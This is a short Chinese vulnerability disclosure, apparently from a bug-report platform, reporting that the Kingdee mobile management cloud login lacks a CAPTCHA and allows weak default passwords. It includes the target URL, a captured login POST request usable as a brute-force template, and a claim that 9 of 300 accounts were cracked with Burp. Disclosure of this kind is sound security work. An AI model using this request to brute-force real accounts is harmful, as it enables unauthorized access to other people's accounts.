### 简要描述:
如题,金蝶企业移动管理云暴力破解+弱口令,未加验证码和默认口令
### 详细说明:
问题网址:http://mcloud.kingdee.com/mcloud/pages/
[<img src="https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg)
```
POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1
Host: mcloud.kingdee.com
Proxy-Connection: keep-alive
Content-Length: 301
Origin: http://mcloud.kingdee.com
User-Agent:
Content-Type: text/plain
Accept: */*
Referer: http://mcloud.kingdee.com/mcloud/pages/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=w5u6heawhjdu1dt5et16a26sk
callCount=1
page=/mcloud/pages/
httpSessionId=w5u6heawhjdu1dt5et16a26sk
scriptSessionId=7EE1BE8590F1DDD3DC769322161A837A576
c0-scriptName=custLoginService
c0-methodName=login
c0-id=0
c0-e1=string:340727
c0-e2=string:340727
c0-param0=Object_Object:{user:reference:c0-e1, pwd:reference:c0-e2}
batchId=0
```
burp测试仅仅测试了300个账户就爆破了9个弱口令账户。如图
[<img src="https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg" alt="捕获.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg)
京公网安备 11010502034610号
暂无评论